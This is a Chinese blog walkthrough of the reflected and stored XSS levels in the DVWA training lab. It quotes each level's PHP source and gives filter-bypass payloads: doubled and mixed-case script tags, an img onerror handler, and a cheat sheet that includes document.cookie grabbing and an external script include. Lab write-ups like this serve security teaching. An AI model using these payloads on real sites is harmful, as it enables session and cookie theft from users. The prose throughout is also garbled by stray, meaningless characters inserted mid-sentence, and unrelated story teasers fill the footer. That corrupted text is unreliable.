DVWA系列之XSS

前期準(zhǔn)備:linux下搭建dvwa需要lamp環(huán)境,其php版本不能太高嚎莉,php7.0無法使用跌榔,php5.6可以;

XSS定義

CSS(Cross Site Script)又叫XSS,中文意思:跨站腳本攻擊折剃。它指的是惡意攻擊者往Web頁面里插入惡意html代碼镶奉,當(dāng)用戶瀏覽該頁之時测蹲,嵌入其中Web里面的html代碼會被執(zhí)行莹捡。XSS的攻擊目標(biāo)是為了盜取客戶端的cookie或者其他網(wǎng)站用于識別客戶端身份的敏感信息道盏。獲取到合法用戶的信息后粹排,攻擊者甚至可以假冒最終用戶與網(wǎng)站進(jìn)行交互射富。

XSS的原理

也就是往HTML中注入腳本芒涡,HTML指定了腳本標(biāo)記<script></script>.在沒有過濾字符的情況下,只需要保持完整無錯的腳本標(biāo)記即可觸發(fā)XSS,假如我們在某個資料表單提交內(nèi)容,表單提交內(nèi)容就是某個標(biāo)記屬性所賦的值,我們可以構(gòu)造如下值來閉和標(biāo)記來構(gòu)造完整無錯的腳本標(biāo)記,"><script>alert('Xss');</script><"

反射型XSS

等級Low

源代碼

<?php
header ("X-XSS-Protection: 0");

// Is there any input?
if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) {
    // Feedback for end user
    echo '<pre>Hello ' . $_GET[ 'name' ] . '</pre>';
}

?> 

這里隨便輸入Word試一下:
word<script>alert('Xss');</script> ;

基本的xss

觀察到調(diào)用函數(shù)輸出了Xss彈窗,后面為Word,其實(shí)<script>”注入語句“</script>可以完成許多功能帅韧。

等級Medium

源代碼:

<?php
header ("X-XSS-Protection: 0");

// Is there any input?
if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) {
    // Get input
    $name = str_replace( '<script>', '', $_GET[ 'name' ] );

    // Feedback for end user
    echo "<pre>Hello ${name}</pre>";
}

?> 

觀察發(fā)現(xiàn)使用str_replace進(jìn)行了黑名單過濾淮阐,繞過這個不成問題勒叠,使用

雙寫繞過

<scri<script>pt>alert(/test/);</script>

大小寫混寫繞過

<sCripT>alert(/test/);</script>

xss

等級High
<?php
header ("X-XSS-Protection: 0");
// Is there any input?
if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) {
    // Get input
    $name = preg_replace( '/<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t/i', '', $_GET[ 'name' ] );
    // Feedback for end user
    echo "<pre>Hello ${name}</pre>";
}

?> 

使用正則進(jìn)行匹配,過濾了大小寫混合寫入已經(jīng)雙寫柒桑,但是可以使用img弊决、body等標(biāo)簽的事件以及iframe標(biāo)簽的src注入惡意的js代碼進(jìn)行漏洞利用
<img src=1 onerror=alert('test')>

xss

等級Impossible

源代碼:

<?php
// Is there any input?
if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) {
    // Check Anti-CSRF token
    checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );
    // Get input
    $name = htmlspecialchars( $_GET[ 'name' ] );
    // Feedback for end user
    echo "<pre>Hello ${name}</pre>";
}
// Generate Anti-CSRF token
generateSessionToken();
?> 

htmlspecialchars() 函數(shù)把一些預(yù)定義的字符轉(zhuǎn)換為 HTML 實(shí)體。以防止瀏覽器將其作為HTML元素幕垦。這樣會將用戶輸入的內(nèi)容都不作為標(biāo)簽以提高安全性丢氢。
預(yù)定義的字符是:

& (和號)成為 &amp;
" (雙引號)成為 &quot;
' (單引號)成為 '
< (小于)成為 &lt;
> (大于)成為 &gt;

一些常用的xss語句

   <script>alert(/test/)</script> 最普通的xss代碼
   <script>alert(document.cookie);</script> 獲取cookie
   <img src="javascript:alert(/test/)"> img鏈接地址xss
   <script src="test.js"> <script> 外部調(diào)用攻擊代碼ls.js
   <script alert('test)</SCRIPT> 注釋方法防止過濾
   <img src="" onerror=alert("xss")> 加載圖像失敗執(zhí)行
   <iframe onload=alert('test')> 框架
   <script>location='test.com';</script> 跳轉(zhuǎn)某頁面

存儲型XSS

等級Low

源代碼:

<?php
if( isset( $_POST[ 'btnSign' ] ) ) {
    // Get input
    $message = trim( $_POST[ 'mtxMessage' ] );
    $name    = trim( $_POST[ 'txtName' ] );

    // Sanitize message input
    $message = stripslashes( $message );
    $message = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $message ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));

    // Sanitize name input
    $name = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $name ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));

    // Update database
    $query  = "INSERT INTO guestbook ( comment, name ) VALUES ( '$message', '$name' );";
    $result = mysqli_query($GLOBALS["___mysqli_ston"],  $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );

    //mysql_close();
}

?> 
部分函數(shù)講解

trim() 函數(shù)移除字符串兩側(cè)的空白字符或其他預(yù)定義字符。
相關(guān)函數(shù):

ltrim() - 移除字符串左側(cè)的空白字符或其他預(yù)定義字符
rtrim() - 移除字符串右側(cè)的空白字符或其他預(yù)定義字符

stripslashes():刪除由 addslashes() 函數(shù)添加的反斜杠先改。該函數(shù)用于清理從數(shù)據(jù)庫或 HTML 表單中取回的數(shù)據(jù)疚察。(若是連續(xù)二個反斜杠,則去掉一個仇奶,保留一個貌嫡;若只有一個反斜杠,就直接去掉该溯。)岛抄;
mysqli_real_escape_string:轉(zhuǎn)義字符串中的特殊字符;

name欄輸入發(fā)現(xiàn)有字?jǐn)?shù)限制狈茉,那就抓包改數(shù)據(jù)夫椭;

抓包

message欄正常輸入即可,<script>alert('test');</script>

等級Medium

源代碼:

<?php
if( isset( $_POST[ 'btnSign' ] ) ) {
    // Get input
    $message = trim( $_POST[ 'mtxMessage' ] );
    $name    = trim( $_POST[ 'txtName' ] );

    // Sanitize message input
    $message = strip_tags( addslashes( $message ) );
    $message = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $message ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
    $message = htmlspecialchars( $message );

    // Sanitize name input
    $name = str_replace( '<script>', '', $name );
    $name = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $name ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));

    // Update database
    $query  = "INSERT INTO guestbook ( comment, name ) VALUES ( '$message', '$name' );";
    $result = mysqli_query($GLOBALS["___mysqli_ston"],  $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );

    //mysql_close();
}

?> 

部分函數(shù)講解
strip_tags() 函數(shù)剝?nèi)プ址械?HTML氯庆、XML 以及 PHP 的標(biāo)簽蹭秋,但允許使用<b>標(biāo)簽扰付。
addslashes() 函數(shù)返回在預(yù)定義字符(單引號、雙引號仁讨、反斜杠羽莺、NULL)之前添加反斜杠的字符串。
其對message參數(shù)使用了htmlspecialchars函數(shù)進(jìn)行編碼洞豁,因此無法對message參數(shù)注入XSS代碼盐固,但是對于name參數(shù),簡單過濾了<script>字符串丈挟,仍然存在存儲型的XSS刁卜。
使用雙寫<scri<script>pt>alert('test')

改包

成功彈框
medium

大小寫混合繞過<sCrIpt>alert('test')

等級High

源代碼:

<?php
if( isset( $_POST[ 'btnSign' ] ) ) {
    // Get input
    $message = trim( $_POST[ 'mtxMessage' ] );
    $name    = trim( $_POST[ 'txtName' ] );

    // Sanitize message input
    $message = strip_tags( addslashes( $message ) );
    $message = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $message ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
    $message = htmlspecialchars( $message );

    // Sanitize name input
    $name = preg_replace( '/<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t/i', '', $name );
    $name = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $name ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));

    // Update database
    $query  = "INSERT INTO guestbook ( comment, name ) VALUES ( '$message', '$name' );";
    $result = mysqli_query($GLOBALS["___mysqli_ston"],  $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );

    //mysql_close();
}
?> 

這里使用正則表達(dá)式過濾了<script>標(biāo)簽,但是依然存在img礁哄、iframe等其它危險的標(biāo)簽长酗,因此name參數(shù)仍然有存儲型XSS
抓包改name數(shù)據(jù)=<img src=1 onerror=alert('test')>

bao.png

成功彈框
圖片.png

等級Impossible

源代碼:

<?php
if( isset( $_POST[ 'btnSign' ] ) ) {
    // Check Anti-CSRF token
    checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );

    // Get input
    $message = trim( $_POST[ 'mtxMessage' ] );
    $name    = trim( $_POST[ 'txtName' ] );

    // Sanitize message input
    $message = stripslashes( $message );
    $message = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $message ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
    $message = htmlspecialchars( $message );

    // Sanitize name input
    $name = stripslashes( $name );
    $name = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $name ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
    $name = htmlspecialchars( $name );

    // Update database
    $data = $db->prepare( 'INSERT INTO guestbook ( comment, name ) VALUES ( :message, :name );' );
    $data->bindParam( ':message', $message, PDO::PARAM_STR );
    $data->bindParam( ':name', $name, PDO::PARAM_STR );
    $data->execute();
}
// Generate Anti-CSRF token
generateSessionToken();

?> 

這個就比較高級了溪北,對name和message均進(jìn)行了htmlspecialchars過濾

存儲型和反射型的區(qū)別
  • 存儲型
    存儲型XSS桐绒,持久型,代碼是存儲在服務(wù)器中的之拨,如果沒有過濾或過濾不嚴(yán)茉继,那么這些代碼將儲存到服務(wù)器中,用戶訪問該頁面的時候觸發(fā)代碼執(zhí)行蚀乔。這種XSS比較危險烁竭,容易造成蠕蟲,盜竊cookie等吉挣。
  • 反射型
    反射型XSS派撕,非持久化,需要欺騙用戶手動去點(diǎn)擊鏈接才能觸發(fā)XSS代碼睬魂,一般容易出現(xiàn)在搜索頁面终吼。
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
  • 序言:七十年代末,一起剝皮案震驚了整個濱河市氯哮,隨后出現(xiàn)的幾起案子际跪,更是在濱河造成了極大的恐慌,老刑警劉巖喉钢,帶你破解...
    沈念sama閱讀 211,123評論 6 490
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件姆打,死亡現(xiàn)場離奇詭異,居然都是意外死亡肠虽,警方通過查閱死者的電腦和手機(jī)幔戏,發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 90,031評論 2 384
  • 文/潘曉璐 我一進(jìn)店門,熙熙樓的掌柜王于貴愁眉苦臉地迎上來税课,“玉大人闲延,你說我怎么就攤上這事豹缀。” “怎么了慨代?”我有些...
    開封第一講書人閱讀 156,723評論 0 345
  • 文/不壞的土叔 我叫張陵邢笙,是天一觀的道長。 經(jīng)常有香客問我侍匙,道長氮惯,這世上最難降的妖魔是什么? 我笑而不...
    開封第一講書人閱讀 56,357評論 1 283
  • 正文 為了忘掉前任想暗,我火速辦了婚禮妇汗,結(jié)果婚禮上,老公的妹妹穿的比我還像新娘说莫。我一直安慰自己杨箭,他們只是感情好,可當(dāng)我...
    茶點(diǎn)故事閱讀 65,412評論 5 384
  • 文/花漫 我一把揭開白布储狭。 她就那樣靜靜地躺著互婿,像睡著了一般。 火紅的嫁衣襯著肌膚如雪辽狈。 梳的紋絲不亂的頭發(fā)上慈参,一...
    開封第一講書人閱讀 49,760評論 1 289
  • 那天,我揣著相機(jī)與錄音刮萌,去河邊找鬼驮配。 笑死,一個胖子當(dāng)著我的面吹牛着茸,可吹牛的內(nèi)容都是我干的壮锻。 我是一名探鬼主播,決...
    沈念sama閱讀 38,904評論 3 405
  • 文/蒼蘭香墨 我猛地睜開眼涮阔,長吁一口氣:“原來是場噩夢啊……” “哼猜绣!你這毒婦竟也來了?” 一聲冷哼從身側(cè)響起澎语,我...
    開封第一講書人閱讀 37,672評論 0 266
  • 序言:老撾萬榮一對情侶失蹤途事,失蹤者是張志新(化名)和其女友劉穎,沒想到半個月后擅羞,有當(dāng)?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體尸变,經(jīng)...
    沈念sama閱讀 44,118評論 1 303
  • 正文 獨(dú)居荒郊野嶺守林人離奇死亡,尸身上長有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點(diǎn)故事閱讀 36,456評論 2 325
  • 正文 我和宋清朗相戀三年减俏,在試婚紗的時候發(fā)現(xiàn)自己被綠了召烂。 大學(xué)時的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片。...
    茶點(diǎn)故事閱讀 38,599評論 1 340
  • 序言:一個原本活蹦亂跳的男人離奇死亡娃承,死狀恐怖奏夫,靈堂內(nèi)的尸體忽然破棺而出怕篷,到底是詐尸還是另有隱情,我是刑警寧澤酗昼,帶...
    沈念sama閱讀 34,264評論 4 328
  • 正文 年R本政府宣布廊谓,位于F島的核電站,受9級特大地震影響麻削,放射性物質(zhì)發(fā)生泄漏蒸痹。R本人自食惡果不足惜,卻給世界環(huán)境...
    茶點(diǎn)故事閱讀 39,857評論 3 312
  • 文/蒙蒙 一呛哟、第九天 我趴在偏房一處隱蔽的房頂上張望叠荠。 院中可真熱鬧,春花似錦扫责、人聲如沸榛鼎。這莊子的主人今日做“春日...
    開封第一講書人閱讀 30,731評論 0 21
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽者娱。三九已至,卻和暖如春淌铐,著一層夾襖步出監(jiān)牢的瞬間肺然,已是汗流浹背。 一陣腳步聲響...
    開封第一講書人閱讀 31,956評論 1 264
  • 我被黑心中介騙來泰國打工腿准, 沒想到剛下飛機(jī)就差點(diǎn)兒被人妖公主榨干…… 1. 我叫王不留,地道東北人拾碌。 一個月前我還...
    沈念sama閱讀 46,286評論 2 360
  • 正文 我出身青樓吐葱,卻偏偏與公主長得像,于是被迫代替她去往敵國和親校翔。 傳聞我的和親對象是個殘疾皇子弟跑,可洞房花燭夜當(dāng)晚...
    茶點(diǎn)故事閱讀 43,465評論 2 348

推薦閱讀更多精彩內(nèi)容

  • XSS,全稱Cross Site Scripting防症,即跨站腳本攻擊孟辑,某種意義上也是一種注入攻擊,是指攻擊者在頁面...
    BerL1n閱讀 1,035評論 0 0
  • XSS XSS蔫敲,全稱Cross Site Scripting饲嗽,即跨站腳本攻擊,某種意義上也是一種注入攻擊奈嘿,是指攻擊...
    網(wǎng)絡(luò)安全自修室閱讀 2,657評論 0 5
  • (一)XSS跨站腳本攻擊 參考:XSS站腳本攻擊 (1)XSS簡介 XSS攻擊全稱跨站腳本攻擊(Cross Sit...
    肆意咯咯咯閱讀 3,542評論 4 3
  • 之前積累了XSS 有一段時間貌虾,因?yàn)槟壳伴_始了一件有趣的工程,需要整合非常多的知識裙犹,其中Web 安全這一塊出現(xiàn)最多的...
    刀背藏身閱讀 9,042評論 0 16
  • 夜深人靜的時候尽狠,可以靜靜地思考這一天來的經(jīng)歷衔憨。白天,大部分時間為自己的生活而奔波著袄膏,沒有什么時間去做過多的思考践图。夜...
    魚耗子閱讀 199評論 0 0